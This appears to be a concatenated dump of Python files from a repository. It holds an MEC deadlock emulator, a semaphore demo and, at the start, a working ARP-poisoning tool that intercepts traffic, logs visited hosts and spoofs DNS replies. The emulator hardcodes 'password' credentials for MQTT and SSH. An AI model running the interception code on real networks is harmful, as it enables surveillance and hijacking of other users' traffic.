answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
return answered_list[0][1].hwsrc
def connect_clients(gateway_ip):
global connected_clients
gateway_mac = get_mac(gateway_ip)
try:
while True:
for client in connected_clients:
packet_1 = scapy.ARP(op=2, pdst=client["ip"], hwdst=client["mac"], psrc=gateway_ip)
packet_2 = scapy.ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=client["ip"])
scapy.send(packet_1,verbose=False)
scapy.send(packet_2,verbose=False)
sleep(2)
except:
print("[!] Restoring ARP Tables......")
for client in connected_clients:
packet_1 = scapy.ARP(op=2, pdst=client["ip"], hwdst=client["mac"], psrc=gateway_ip, hwsrc=gateway_mac)
packet_2 = scapy.ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=client["ip"], hwsrc=client["mac"])
scapy.send(packet_1, count=4, verbose=False)
scapy.send(packet_2, count=4, verbose=False)
def read_blocked_websites():
global blocked_websites
blocked_website_list_file = open("website_list.txt", "r")
for each_website in blocked_website_list_file:
blocked_websites.append(each_website.strip("\n"))
def write_log(url):
log_file.write(asctime()+"\t"+url+"\n\n")
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(http.HTTPRequest):
if scapy_packet[scapy.TCP].dport == 80:
url = "User at ip "+str(scapy_packet[scapy.IP].src) + " Accessed: "+str(scapy_packet[http.HTTPRequest].Host) #+ str(scapy_packet[http.HTTPRequest].Path)
#print(url)
write_log(url)
if scapy_packet.haslayer(scapy.DNSRR):
website_requested = scapy_packet[scapy.DNSQR].qname.decode()
for name in blocked_websites:
if name in website_requested:
print("[+] Blocking Website:",website_requested)
answer = scapy.DNSRR(rrname=website_requested, rdata="10.0.2.14")
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].chksum
del scapy_packet[scapy.UDP].len
packet.set_payload(bytes(scapy_packet))
packet.accept()
def filter_traffic():
print("[+] Reading blocked website list")
try:
read_blocked_websites()
except:
print("[-] Error Occurred, Unable to read file")
else:
print("[+] Website list successfully read")
print(blocked_websites)
while True:
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
try:
options = get_arguments()
scan_network = Thread(target=scan, args=(options.target,), daemon=True)
route_clients = Thread(target=connect_clients, args=(options.gateway_ip,), daemon=True)
network_filter = Thread(target=filter_traffic, daemon=True)
scan_network.start()
route_clients.start()
network_filter.start()
scan_network.join()
route_clients.join()
network_filter.join()
except KeyboardInterrupt:
gateway_mac = get_mac(options.gateway_ip)
print("[!] Restoring ARP Tables......")
for client in connected_clients:
packet_1 = scapy.ARP(op=2, pdst=client["ip"], hwdst=client["mac"], psrc=options.gateway_ip, hwsrc=gateway_mac)
packet_2 = scapy.ARP(op=2, pdst=options.gateway_ip, hwdst=gateway_mac, psrc=client["ip"], hwsrc=client["mac"])
scapy.send(packet_1, count=4, verbose=False)
scapy.send(packet_2, count=4, verbose=False)
print("[+] ARP Tables Restored")
print("[+] Writing Logs to the Memory...........")
log_file.close()
print("[+] Logs Successfully written.......Quitting....")
|
algo_one.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
# update required not done
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
outward_mec = 0 # keeps count of tasks sent back to another mec after executing
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
shared_resource_lock = threading.Lock()
t_track = 1
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
# cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
cmd = ['ifconfig ens4 | grep inet | head -n 1 | cut -d "t" -f 2 | cut -d " " -f 2']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id, )
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
total_received_task = 0
def scheduler(_lcm_, s_tasks): # RMS algorithm
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
# generate execution sequence
def is_safe(processes, avail, _need_, allot, p): # bankers algorithm
need = [_need_[i] for i in _need_]
_allot_ = [allot[i] for i in allot]
# tasks to offload if exit
offload = []
# Number of resources
res = 3
# Mark all processes as unfinished
finish = [0] * p
# To store safe sequence
safe_seq = [0] * p
# Make a copy of available resources
work = [0] * res
for i in range(res):
work[i] = avail[i]
# While all processes are not finished
# or system is not in safe state.
count = 0
while count < p:
# Find a process which is not finish
# and whose needs can be satisfied
# with current work[] resources.
found = False
for t in range(p):
# First check if a process is finished,
# if no, go for next condition
if finish[t] == 0:
# Check if for all resources
# of current P need is less
# than work
for j in range(res):
if need[t][j] > work[j]:
break
# If all needs of p were satisfied.
if j == res - 1:
# Add the allocated resources of
# current P to the available/work
# resources i.e.free the resources
for k in range(res):
work[k] += _allot_[t][k]
# Add this process to safe sequence.
safe_seq[count] = processes[t]
count += 1
# Mark this p as finished
finish[t] = 1
found = True
# If we could not find a next process
# in safe sequence.
if not found:
print("System is not in safe state")
a = list(set(processes) - set(safe_seq) - set(offload))
_max = np.array([0, 0, 0])
n = {}
for i in a:
n[i] = sum(allocation[i[:2]])
_max = max(n, key=n.get)
print('work: ', work, 'need: ', _need[_max[:2]])
offload.append(_max)
work = np.array(work) + np.array(allocation[_max[:2]])
count += 1
# Mark this p as finished
finish[processes.index(_max)] = 1
found = True
# If system is in safe state then
# safe sequence will be as below
if len(offload) > 0:
safe_seq = safe_seq[:safe_seq.index(0)]
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print("System is in safe state.",
"\nSafe sequence is: ", end=" ")
print('safe seq: ', safe_seq)
return safe_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return is_safe(processes, avail, n_need, allot, p)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# waiting time = total waiting time ÷ 2 average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
timed_out_tasks = 0
def compare_local_mec(list_seq):
global received_time, timed_out_tasks
execute_mec = []
execute_locally = []
diff = time.time() - received_time.pop(0)
checking_times = {}
for i in list_seq:
t_time[i.split('_')[0]][1] -= diff
# if t_time[i.split('_')[0]][1] < 0:
# _client.publish(i.split('_')[0].split('.')[2], str({i.split('_')[0]: get_time() + ['local']}), )
# timed_out_tasks += 1
if t_time[i.split('_')[0]][1] > list_seq[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
checking_times[i] = {'Latency': t_time[i.split('_')[0]][1], 'Expected_exec_time': list_seq[i]}
print('Execution time comparison:= ', checking_times)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
# print('received: ', hosts)
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0])) # calcuate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
offload_check = [0, 0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
# if len(exec_list) != len(offloaded_task[0]):
# print('\n\n', '@ ' * 50)
# print('exec: ', exec_list, 'off: ', offloaded_task[0])
# print('\n\n', '@ ' * 50)
# offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
# if j.split('.')[1] != node_id:
# send_offloaded_task_mec('{} {}'.format(j.split('.')[1], j))
# outward_mec += 1
# elif j.split('.')[1] == node_id:
# # send_client({j: get_time()}, send_back_host)
# _client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
# count_task_sent(j)
# else:
# print('else execute: ', j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list, outward_mec
global offload_check
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
offload_check[0] += 1
outward_mec += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
offload_check[1] += len(o)
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+bankers {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
c.close()
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_2_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_2_{mec_no} = {mec_rtt} \ncpu{_id_}_2_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_2_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_2_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_2_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_2_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_2_{mec_no} = {deadlock} \nmemory{_id_}_2_{mec_no} = {memory}" \
f"\ntask_received{_id_}_2_{mec_no} = {total_received_task} \nsent_t{_id_}_2_{mec_no} = {clients_record}" \
f"\ncooperate{_id_}_2_{mec_no} = {cooperate} \ntask_record{_id_}_2_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_2_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_2_{mec_no} = {offload_check}\n" \
f"\ntimed_out_tasks{_id_}_2_{mec_no} = {timed_out_tasks}\n"
list_result = [
f"\nwt{_id_}_2_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_2_{mec_no} = {mec_rtt} \ncpu{_id_}_2_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_2_{mec_no} = {_off_mec} \noff_cloud{_id_}_2_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_2_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_2_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_2_{mec_no} = {deadlock} \nmemory{_id_}_2_{mec_no} = {memory}",
f"\ntask_received{_id_}_2_{mec_no} = {total_received_task} \nsent_t{_id_}_2_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_2_{mec_no} = {cooperate} \ntask_record{_id_}_2_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_2_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_2_{mec_no} = {offload_check}"
f"\ntimed_out_tasks{_id_}_2_{mec_no} = {timed_out_tasks}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datap.py"
os.system(cmd)
else:
os.mkdir(path_)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_2_{mec_no}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}{_id_}_2_{mec_no}datal.py'
file_.write(i)
os.system(cmd)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_2_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:{send_path}"])
send_result(hosts['osboxes-0'], list_result)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
def terminate_process():
global prev_t, _loc, _off_mec, _off_cloud, _inward_mec, outward_mec, deadlock, memory, mec_waiting_time, mec_rtt
global offload_register, reoffload_list, discovering, test, _time, _pos, received_task_queue, received_time
global cloud_register, t_track, task_record, task_id, cooperate, clients_record, offload_check
global timed_out_tasks, total_received_task, _cpu
# reinitialize #
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
outward_mec = 0 # keeps count of tasks sent back to another mec after executing
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
t_track = 1
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
cooperate = {'mec': 0, 'cloud': 0}
clients_record = {}
offload_check = [0, 0]
timed_out_tasks = 0
total_received_task = 0
time.sleep(1)
run = 1 # tell agents child when to stop
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
print('algorithm is starting....')
print('========= Waiting for tasks ==========')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('RMS List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
if len(compare_result[0]) > 0:
print('\nSending to cooperative platform')
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(0.4)
except KeyboardInterrupt:
print('\nProgramme Terminated')
stop = False
for th in threads_:
th.join()
time.sleep(1)
print('done')
# os.system('kill -9 {}'.format(os.getpid()))
break
print('algo stopped!')
run = 1
stop = True
time.sleep(20)
for th in threads_:
th.join()
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
print('saving data')
save_and_send(send_path)
print('Terminating process')
terminate_process()
|
Semaphore.py
|
import logging
import threading
import time
import random
LOG_FORMAT = '%(asctime)s %(threadName)-17s %(levelname)-8s %(message)s'
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
semaphore = threading.Semaphore(0)
item = 0
def consumer():
logging.info('Consumer is waiting')
semaphore.acquire()
logging.info('Consumer notify: item number {}'.format(item))
def producer():
global item
time.sleep(3)
item = random.randint(0, 1000)
logging.info('Producer notify: item number {}'.format(item))
semaphore.release()
def main():
for i in range(10):
t1 = threading.Thread(target=consumer)
t2 = threading.Thread(target=producer)
t1.start()
t2.start()
t1.join()
t2.join()
if __name__ == "__main__":
main()
|
runner.py
|
#!/usr/bin/env python3
